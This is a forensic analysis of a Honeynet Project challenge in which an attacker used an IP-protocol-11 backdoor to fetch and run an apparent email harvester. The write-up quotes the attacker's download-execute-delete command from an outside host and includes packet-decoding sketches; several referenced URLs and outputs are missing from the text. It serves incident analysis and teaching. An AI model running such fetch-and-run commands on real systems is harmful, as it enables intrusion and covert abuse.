HoneyNet Challenge Analysis
Scan 22 – August 2002
The Challenge
After penetrating the Linux system using the WU-FTPD vulnerability, the attacker deployed a backdoor binary and then proceeded to use the system for certain nefarious activity. Your mission, should you choose to accept it, is to determine what the activity was and how it was accomplished. All the necessary evidence is contained in the snort binary capture file. The IP address of the honeypot is 172.16.183.2.
Preliminary Steps
As this attack was built on the backdoor binary that was the subject of the Reverse Challenge from May 2002, my first step was to read some of the analyses from that Challenge. Of particular value to me was the advisory written by the (CoPS) Lab at the University of North Texas, located here:
To summarize, the backdoor binary listens for IP packets that have the protocol number set to 11 (the NVP protocol). Because the protocol is stateless, the source IP address can be spoofed. Each packet carries a type number, which is either 2 for a command or 3 for a reply, and the rest of the payload is trivially encoded to hide its contents. Having loaded the Snort log in Ethereal, I could see these packets, beginning at packet #7.
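To make the packet format concrete, here is a minimal Python sketch that classifies a raw IPv4 packet as an NVP command or reply and reverses the encoding. The protocol number (11) and the type values (2 and 3) come from the summary above. Two details are assumptions that should be checked against the Reverse Challenge source: that the type byte is the first byte after the IP header, and that the "trivial" encoding chains each byte to the previous encoded byte plus an offset of 0x17. The function names are hypothetical.

```python
NVP_PROTOCOL = 11   # IP protocol number the backdoor listens on (from the text)
TYPE_COMMAND = 2    # handler -> agent (from the text)
TYPE_REPLY = 3      # agent -> handler (from the text)
KEY = 0x17          # ASSUMPTION: offset used by the encoding; verify against the source


def classify_nvp(ip_packet: bytes):
    """Return 'command', 'reply' or None for a raw IPv4 packet.

    ASSUMPTION: the type byte is the first byte after the IP header.
    """
    if len(ip_packet) < 20 or ip_packet[0] >> 4 != 4:
        return None                        # too short, or not IPv4
    ihl = (ip_packet[0] & 0x0F) * 4        # IP header length in bytes
    if ihl < 20 or ip_packet[9] != NVP_PROTOCOL or len(ip_packet) <= ihl:
        return None                        # malformed, other protocol, or no payload
    return {TYPE_COMMAND: "command", TYPE_REPLY: "reply"}.get(ip_packet[ihl])


def encode(plain: bytes) -> bytes:
    """Assumed scheme: each output byte = input byte + previous output byte + KEY."""
    out = bytearray()
    prev = 0
    for b in plain:
        prev = (b + prev + KEY) & 0xFF
        out.append(prev)
    return bytes(out)


def decode(enc: bytes) -> bytes:
    """Invert encode(): subtract the previous *encoded* byte and KEY."""
    out = bytearray()
    prev = 0
    for b in enc:
        out.append((b - prev - KEY) & 0xFF)
        prev = b
    return bytes(out)
```

Under these assumptions, decode(encode(b"hello")) returns b"hello"; decode() would be applied to the encoded portion of the payload only.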
In order to read the packets easily, I downloaded and used Dion Mendel's Perl script from the Reverse Challenge. It is located here:
I quickly (okay, it took a few minutes of head scratching) found a small typo in the script: on lines 59 and 87, the second $data[4] should read $data[5]. After making the necessary change, I re-ran the script on the Snort log and studied the output:
94.0.146.98 -> 172.16.183.2 (handler -> agent)
I must admit that after this, I spent about six hours becoming more and more baffled. I was working under the assumption that 'foo' was an IRC bot, an assumption first given to me by The Honeynet Project itself, here.
The assumption was backed up when I started doing Google searches for some of the text that I found in 'foo' and the searches kept coming back with links to an IRC bot named “Puaj”.
Part of the problem I had with this is that I never use IRC. I briefly played around with multi-user BBSs back in the 1980s, and since then I have always felt that, in terms of useful or even entertaining ways of spending time, electronic chat ranks well below scrubbing mildew from the cracks between my bathroom tiles. Hence I did not even really know what an IRC bot was.
So, after spending some time reading about the many and varied uses of IRC bots, I was unable to reconcile what I had learned with the behaviour of 'foo', which simply appeared to be requesting the home pages of IRC users. I was also still wondering why an IRC hacker would care about the DNS zones hosted by the system (the first command our hacker sent to the NVP Trojan). It was only when I began to seriously doubt my original assumption that I noticed something odd about the behaviour of 'foo' that gave me a new idea about what the attacker's purpose might be.
I will elaborate on this in the answers section, but I have finally come to the conclusion that this attacker is a spammer or is working for spammers.
Answers
1. What is the attacker's IP Address?
This one is simple: 203.173.144.50. It was sent to the NVP Trojan in the first packet. According to WHOIS, the attacking machine is located in New Zealand.
2. What is the attacker doing first? What do you think is his/her motivation for doing this?
The first thing the attacker does after initializing the trojan is to tell it to run the command:
3. Why is there some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?
Actually, all of the response packets from the victim have some readable text in them; part of the command executed by the trojan and part of the response. This is due to sloppy coding on the part of the programmer who created the NVP Trojan. To understand why this is happening, I looked at Dion Mendel's source code for the reverse engineered binary.
If you are unfamiliar with C, this section may be confusing to you. If so, I apologize. I considered putting in a paragraph describing how string buffer pointers work, but figured that I would probably just end up making it more confusing.
At line 2,211 the code constructs a command string and stores it at the memory location pointed to by 'buffer' (using the dangerous sprintf() function, which means that, ironically, the trojan itself may be vulnerable to buffer overflow attacks!). So, in our attack, we now have a string in memory that reads:
So far so good, but the programmer decided that she wanted each response packet to be a random size. She tells the transmit function to send the contents of memory starting at the 'output_buffer' pointer: 400 bytes plus an extra random number of bytes between one and two hundred. The programmer no doubt assumed that those extra bytes would look like garbage. Well, as I pointed out in my Preliminary Steps section, assumptions can be dangerous. In this case, when the program allocated memory for the strings, it must have placed 'buffer' directly after 'output_buffer'. You can literally see the results:
In the first response packet (which is sent out 10 times: once to the handler and once to each of nine random IP addresses), the data section is 512 bytes, which means 400 bytes of encoded (and padded) data plus 112 bytes from the 'buffer' memory. This includes all of the text shown above plus some garbage.
In the second response packet, the data section is 463 bytes: 400 bytes of encoded and padded data and 63 bytes of the text above. Counting it now, I see that I am off by a bit (okay, a bunch of bits), which means that there are probably a few bytes allocated to an integer between the two strings, but the theory still holds.
Hence, the programmer has managed to do exactly what they meant to avoid: transmit suspicious-looking traffic.
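The over-read described above can be modelled in a few lines. This Python sketch is not the trojan's code: it assumes, as the analysis above infers, that 'buffer' lies immediately after a 400-byte 'output_buffer', and it treats the pair as one contiguous region from which 400 plus some extra bytes are sent. The function name and the placeholder command text are hypothetical, and the zero padding is an assumption.

```python
OUTPUT_LEN = 400  # fixed part of every reply, per the analysis above


def simulate_reply(encoded: bytes, adjacent: bytes, extra: int) -> bytes:
    """Return the bytes a reply of OUTPUT_LEN + extra would carry.

    ASSUMPTION: 'adjacent' (standing in for 'buffer') sits directly after the
    400-byte 'output_buffer' in memory, so anything past OUTPUT_LEN is leaked
    from it. The model stops where 'adjacent' ends; real memory keeps going.
    """
    # Pad the encoded data out to the fixed length (zero padding is assumed).
    memory = encoded[:OUTPUT_LEN].ljust(OUTPUT_LEN, b"\x00") + adjacent
    return memory[:OUTPUT_LEN + extra]


reply = simulate_reply(b"\xaa" * 400, b"HYPOTHETICAL COMMAND TEXT", 10)
leaked = reply[OUTPUT_LEN:]  # the readable tail an analyst would see
```

Plugging in the sizes from the capture, a 512-byte reply exposes 512 - 400 = 112 bytes from 'buffer', and a 463-byte reply exposes 463 - 400 = 63 bytes.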
4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?
The observed behaviour of foo is thus:
What finally clued me in to the idea that the attacker is a spammer is step 4 above. Why, I wondered, didn't 'foo' wait for the full response from the icq.com server? Why was it closing the connection halfway through the web page download? It took me a while, but I finally realized that the last packet that 'foo' accepted was the packet that contained the ICQ user's email address. It could be coincidence, but I can think of no other explanation for this behaviour: 'foo' is a tool of evil, a real-life email address harvester.
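One way to test this theory against the capture is to take the server's TCP payload segments in order and find the first one that contains something shaped like an email address; if that index matches the last segment 'foo' accepted before closing the connection, the harvester theory gains support. This Python sketch is a hypothetical analysis helper, not part of 'foo'. It uses a deliberately simple (assumed) regular expression and will miss an address that is split across two segments.

```python
import re

# Deliberately simple email-like pattern; real addresses can be more varied.
EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def first_segment_with_email(segments):
    """Return (index, address) for the first segment containing an email-like
    string, or None if no segment does. Segments are checked independently."""
    for i, seg in enumerate(segments):
        m = EMAIL_RE.search(seg)
        if m:
            return i, m.group().decode("ascii")
    return None
```

Comparing the returned index with the segment after which 'foo' closed the connection turns the hunch into a check that can be repeated for every request in the log.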
With the exception of the HTTP GET command, the only readable text in 'foo' comes from pre-existing library code such as gethostbyname and yplibc. This leads me to believe that the actual code was obfuscated, either at the source level or during compilation to object code. Still, I can make a few observations about 'foo'. The first is that it contains its own DNS resolver, although it uses the locally configured DNS server. This is probably to ensure that it can use DNS even if the local system is not set up to do so, and it likely has a DNS server address to fall back on if it cannot find one in resolv.conf.
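The resolver behaviour guessed at above (use the nameserver from resolv.conf, otherwise fall back to a built-in address) might look like the following Python sketch. It is purely illustrative: the fallback address is a hypothetical value from the TEST-NET-1 documentation range, since nothing in the capture shows what fallback, if any, 'foo' carries.

```python
FALLBACK_NAMESERVER = "192.0.2.53"  # hypothetical fallback (documentation range)


def pick_nameserver(resolv_conf_text: str) -> str:
    """Return the first 'nameserver' entry in resolv.conf text, else the fallback."""
    for line in resolv_conf_text.splitlines():
        fields = line.split()
        # Comment lines begin with '#' or ';', so their first field never
        # equals 'nameserver' and they are skipped naturally.
        if len(fields) >= 2 and fields[0] == "nameserver":
            return fields[1]
    return FALLBACK_NAMESERVER
```

Taking only the first entry mirrors the ordinary resolver convention of trying nameservers in the order listed.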
More interesting is the inclusion of the Network Information Service (formerly YP) library 'yplibc'. Obviously, an email harvester is useless if you cannot retrieve the email addresses it has found. My guess here is that 'foo' opens an RPC listener bound to a TCP or UDP port through which the attacker can request the list of email addresses found. This would remove the need to exploit the system again and would ensure that no suspicious log files are left behind, which is something the attacker seems concerned about (more on that later).
Finally, on the question of the programmer's skill, I have very little information on which to base an opinion, but I would have to say that he or she is closer to amateur than to expert. My reasons for saying so are:
5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?
The full command line sent by the attacker is:
killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
What the attacker is doing here is:
So the purpose of this part of the command is to execute the program and then delete it from the disk so that it leaves no easily discernible traces. The attacker is obviously very concerned about this, as he or she repeats the rm command three more times.
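Because the steps are joined with ';', the shell runs them strictly one after another, each starting only once the previous one has finished, whatever its exit status. This small Python sketch splits the command line quoted above into those steps. The naive split on ';' works here only because none of the commands contain a quoted semicolon; the helper name is hypothetical.

```python
ATTACK_CMD = (
    "killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; "
    "chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;"
)


def split_steps(cmd: str) -> list[str]:
    """Split a ';'-separated shell command line into its individual commands,
    dropping the empty piece left by a trailing ';'."""
    return [part.strip() for part in cmd.split(";") if part.strip()]


for n, step in enumerate(split_steps(ATTACK_CMD), 1):
    print(n, step)
```

Listed this way, it is easy to see that the rm step is the last of six and only runs after ./ttserve has returned.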
6. How do you think the attacker will use the results of his activity involving 'foo'?
If my belief is correct and 'foo' is an email address harvester, the attacker will use the results of 'foo' to send unsolicited commercial email to the poor ICQ users whose email addresses are on display on their generated web pages. The other possibility is that the attacker is not a spammer himself or herself but is in the business of selling email addresses to spammers.
Either way, the hapless ICQ users can look forward to seeing their inboxes fill up with mail inviting them to hot teen sex sites, offering cheap Viagra alternatives, and pleading with them to help the daughters of former Nigerian dictators.
BONUS QUESTION!
As a network administrator, I would never have a firewall so badly misconfigured that it allowed packets in or out with the IP protocol field set to 11. Additionally, I would have been alerted to the attempt by my Snort IDS, which would have logged the packets as “Bad Traffic: Non-Standard IP Protocol”, an alert I would certainly have investigated further.